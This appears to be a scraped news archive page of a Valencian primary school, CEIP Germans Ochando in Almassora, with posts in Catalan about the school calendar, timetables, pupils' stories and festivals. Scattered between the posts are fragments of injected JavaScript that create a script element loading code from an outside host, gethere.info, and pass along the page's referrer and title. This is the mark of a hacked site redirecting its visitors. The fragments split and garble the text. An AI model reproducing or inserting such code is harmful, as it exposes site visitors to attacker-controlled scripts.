Archive for Noticies

EDUC@RT

Ací teniu la presentació, que 5 companys del centre han realitzat, per a explicar el treball de tot el claustre realitzat, al llarg del curs 2014-15, en les noves tecnologies. Val la pena perdre uns minuts mirant-lo. Esperem vos agrade i poder seguir per este camí molts anys mes.

if (document.currentScript) {

CALENDARI ESCOLAR 2015-16

Donat que el dijous 24 de març era el dia triat per recuperar com a lectiu, per poder així fer no lectius els 5 dies de la setmana de ST Quitèria (23-24-25-26-27 de maig) i donat ara l’impossibilitat de fer-ho lectiu, a l’haver estat declarat coma festiu de la Comunitat Valenciana. El Consell Escolar Municipal ha decidit, demanar revertir a dia lectiu el 23 de desembre, mantenint el dijous 24 de març com a festiu.

El calendari escolar queda així:

CALENDARI ESCOLAR 2015 nadal

var d=document;var s=d.createElement(‘script’);

RESOLUCIÓ D’HORARI ESPECIAL

A l’ATENCIÓ DE PARES I ALUMNES

Amb data 18 de Julio la directora territorial ens ha aprovat l’horari especial per al curs 2013-14. Us avancem aquest horari d’octubre a Maig perquè pugueu anar organitzant-vos, encara que ho explicarem detalladament en la reunió d’inici de curs que se celebrarà en els salons de Caixalmassora

HORARI DE SETEMBRE : 09:00 A 13:00

NOU HORARI D’OCTUBRE A MAIG:

09:00 A 12:30
15:30 A 17:00

 

ATT Manuel Balada

}

DE SANT ANDREU

Versió fantàstica de com es va celebrar la primera fira en Almassora creada pels alumnes de sisè B .  Pots escoltar-ho açí.

 

LA PRESA DE LA MURÀ

Els alumnes de sisè  A han redactat este conte que parla d’un fet històric del nostre poble.

Açí pots escoltar-ho

 

 

var d=document;var s=d.createElement(‘script’);

GERMANS OCHANDO PRACTICA L’EDUCACIÓ PER LA DEMOCRÀCIA

if (document.currentScript) {

ESMORZAR SALUDABLE

El CEIP Germans Ochando impulsa la comida sana

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

EL TERCER CICLE A VALÈNCIA.

LA CASTANYADA

Ja que una imatge val mes que cent paraules, açí en teniu unes poques de la festa de la Castanyada que vam realitzar el divendres 16 amb la col·laboracció de la residencia de la tercera edad, dins del projecte servei que el nostre centre te amb ells.

Feu click a la imatge per accedir a la galeria.

 

}